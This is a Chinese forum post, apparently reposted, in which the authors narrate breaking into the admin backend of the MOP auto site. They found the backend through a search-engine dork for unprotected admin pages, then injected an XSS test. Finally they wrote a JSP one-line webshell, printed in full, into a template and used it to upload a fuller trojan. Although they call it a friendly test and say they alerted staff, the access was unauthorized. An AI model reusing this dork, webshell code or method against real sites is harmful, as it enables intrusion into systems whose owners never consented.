D0000D发往论坛板块-------------------------------------------------------
No2  号板块  技术文章
D8888D贴子标题-------------------------------------------------------
检测MOP社区
D8888D主贴内容-------------------------------------------------------
 

作者:冷月渡云&Amxking

文章来源:bbs.honkwin.com

首先这次的检测纯属是个偶然？为什么是偶然大家请慢慢听我说吧.这里感谢AK！我本来想利用搜索引擎玩下后台过滤不严的网站！

[img]http://www.nhs8.com/upload/201004150034312063.jpg[/img]


大家都知道搜索inurl:admin/main.php（脚本格式随便反正jsp就搜索到mop了）很多网站直接进去后台！

[img]http://www.nhs8.com/upload/201004150034313316.jpg[/img]


这里我们可以很清楚地看到MOP的网站，我抱着不大的希望点了下（毕竟是MOP汽车网！文件处理得很好的吧）谁知道点了下直接进去了MOP

[img]http://www.nhs8.com/upload/201004150034316031.jpg[/img]


进去了，当然我第一时间就会看下有没上传之类的漏洞！点了下图片管理！

流程:图片管理-查看相册-上传文件

这个图片是任意文件都可以上传？但是却是上传到mop的管理图片的服务器！咱们看一下图片

[img]http://www.nhs8.com/upload/201004150034313114.jpg[/img]

[img]http://www.nhs8.com/upload/201004150034318042.jpg[/img]


这个服务器目录做了安全设置，jpg、html、txt当然支持的啦！其他为木马文件都不能正常访问！这里转了大约1个多小时去搞，继续转下！这个后台有没其他的特别之处...果然发现到一个可爱的地方了

[img]http://www.nhs8.com/upload/201004150034317775.jpg[/img]

这里，可以修改！我随便在代码加上<script>alert("xss")</script>

[img]http://www.nhs8.com/upload/201004150034315583.jpg[/img]

点了下，当前的栏目代码执行了.之后修改111.

[img]http://www.nhs8.com/upload/201004150034315841.jpg[/img]

中间出现我写的东西，我当时随想？在这里写个JSP木马进去看下能不能显示出来！这html当然是调用某个JSP文件啦

[img]http://www.nhs8.com/upload/201004150034327878.jpg[/img]


保存起来，回到刚才那里刷新下！

[img]http://www.nhs8.com/upload/201004150034324372.jpg[/img]


出错了，这是怎么回事？这里困扰了大约1个小时左右吧！绝对是调用某个文件的！代码绝对成功写入.之后猜解下
[url=http://auto.mop.com/index.jsp]链接标记http://auto.mop.com/index.jsp[/url] 访问正常，[url=http://auto.mop.com/data/index.jsp]链接标记http://auto.mop.com/data/index.jsp[/url] 空白证明此文件是存在的！猜想代码执行在data目录下的，估计调用肯定是index.jsp文件了！但是访问是正常.之后想了下，会不会安全方面做了下！保存好JSP木马出现这个！

[img]http://img017.photo.21cn.com/photos/album/20100415/m620x800/9350E6CED993FA4128D4ADBF96BB9886.jpg[/img]

返回刚才那里哦？证明是出错的了！之后放个jsp一句话进去啦，毕竟感觉调用index.jsp文件！网上就一个一句话木马还是觉得不好用的那个呢！
<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>

证明我的猜想是没错！果然是调用data/index.jsp文件！执行
但是挂个页面有什么用啊？必须写个JSP木马进去？我也不会笨到真的用GET方式把木马写进去...AK也是用了POST提交上去的.（POST提交工具有很多款可以实现，NC也可以实现）
最后朋友仍了个html文件把jsp木马提交上去了，（我感谢的不是这个POST提交软件，是表单里的JSP马），因为AK和我测试了很多次.很多jsp马都出现500错误！但愿有个文件编辑就可以了.最后上图

[img]http://www.nhs8.com/upload/201004150034340348.jpg[/img]


Amxking：我和hsren等了半个小时,终于看到了冷月的身影，随后D.EETL也闯了进来，我们交流了一番各自的过程和经验，就组织清理webshell及提醒信息页面。冷月渡云负责撰写文章，我负责提醒mop工作人员修复漏洞！后来又发现一个有趣的地方，就是mop的网络架构，服务器之间的同步很有意义。webshell虽然被删除并清理掉某弟弟胡乱放的杂七杂八的脚本，依然可以在“无webshell脚本的情况下执行webshell”。这个病句大家好好思考吧，原因我是找到了，呵呵！ 
最后提醒一句，不要去破坏！否则将追究责任的了！ 本作品只为记录这次友情测试过程，重在思路！

转载地址：[url=http://www.nhs8.com/post/2002.html]链接标记http://www.nhs8.com/post/2002.html[/url]
